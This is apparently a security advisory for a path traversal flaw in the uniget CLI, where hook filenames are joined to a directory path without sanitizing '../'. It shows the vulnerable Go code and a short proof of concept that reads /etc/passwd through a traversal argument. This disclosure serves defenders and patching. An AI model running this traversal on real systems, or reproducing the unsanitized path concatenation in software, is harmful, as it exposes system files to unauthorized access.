GHSA-m6jg-wr9m-cg2fMedium

uniget CLI has Path Traversal in Hook Files - Directory Escape Vulnerability

Published
August 17, 2026
Last Modified
August 17, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

Path Traversal vulnerability in hook filename handling allows attackers to access and manipulate arbitrary files outside the hooks directory via directory escape sequences like passwd.

Details File: hooks.go Lines 135-160

hookFileName := args[0]  // User input not validated
hookFile = preInstallHooksDir + "/" + hookFileName  // Direct concatenation

Hook filenames are concatenated directly without sanitizing ../ sequences, allowing directory traversal.

PoC

Step 1: Set cat as editor

export EDITOR="cat"

Step 2: Read /etc/passwd via path traversal

./uniget hooks edit --type=pre-install "../../../../etc/passwd"

Step 3: Output shows file contents

root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[...]

🎯 Affected products1

  • go/gitlab.com/uniget-org/cli:< 0.27.6

🔗 References (4)